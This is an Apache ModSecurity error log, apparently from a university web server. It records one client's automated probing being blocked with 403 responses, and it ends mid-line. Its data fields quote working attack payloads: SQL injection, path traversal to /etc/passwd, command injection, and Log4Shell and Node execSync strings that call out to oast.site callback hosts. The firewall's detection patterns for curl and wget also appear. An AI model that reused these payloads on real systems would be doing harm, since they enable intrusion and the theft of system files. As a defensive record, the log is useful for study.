[Tue Aug 29 11:33:18.968384 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgw0AAAAU"]
[Tue Aug 29 11:33:19.050950 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARy-sIAAAAb"]
[Tue Aug 29 11:33:19.349740 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAANsAdsAAAAD"]
[Tue Aug 29 11:33:19.355752 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARQ384AAAAB"]
[Tue Aug 29 11:33:20.363418 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAAR2Z3QAAAAe"]
[Tue Aug 29 11:33:21.319794 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARwurgAAAAZ"]
[Tue Aug 29 11:33:22.327795 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlg513ffw5eue146.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARfwkIAAAAI"]
[Tue Aug 29 11:33:23.319846 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARwur4AAAAZ"]
[Tue Aug 29 11:33:24.336776 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARzXxoAAAAd"]
[Tue Aug 29 11:33:24.359878 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgn5x9fi5p8cjdc.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARfwkoAAAAI"]
[Tue Aug 29 11:33:25.327550 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARy-tAAAAAb"]
[Tue Aug 29 11:33:25.374471 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARt-8sAAAAV"]
[Tue Aug 29 11:33:26.392476 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARTEOUAAAAG"]
[Tue Aug 29 11:33:26.447598 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgrrjra5r7sosx4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARQ3@AAAAAB"]
[Tue Aug 29 11:33:26.464685 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAANsAfMAAAAD"]
[Tue Aug 29 11:33:27.328571 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARt-9EAAAAV"]
[Tue Aug 29 11:33:27.349545 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARo8ykAAAAT"]
[Tue Aug 29 11:33:27.351413 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARfwlIAAAAI"]
[Tue Aug 29 11:33:28.345620 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARTEO8AAAAG"]
[Tue Aug 29 11:33:29.319335 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARA7g4AAAAA"]
[Tue Aug 29 11:33:31.336475 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAARy-u0AAAAb"]
[Tue Aug 29 11:33:31.341249 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "mbkm.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAARy-u0AAAAb"]
[Tue Aug 29 11:33:32.033408 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASAHYsAAAAH"]
[Tue Aug 29 11:33:32.131087 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgrr4aijyjg7n89.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARv7SkAAAAY"]
[Tue Aug 29 11:33:32.380034 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARy-vUAAAAb"]
[Tue Aug 29 11:33:34.354644 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAOJKegAAAAE"]
[Tue Aug 29 11:33:35.323445 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASAHaIAAAAH"]
[Tue Aug 29 11:33:35.371111 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARLXzAAAAAQ"]
[Tue Aug 29 11:33:35.399797 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARA7hsAAAAA"]
[Tue Aug 29 11:33:36.331334 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAAQKOnAAAAAs"]
[Tue Aug 29 11:33:36.352189 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id 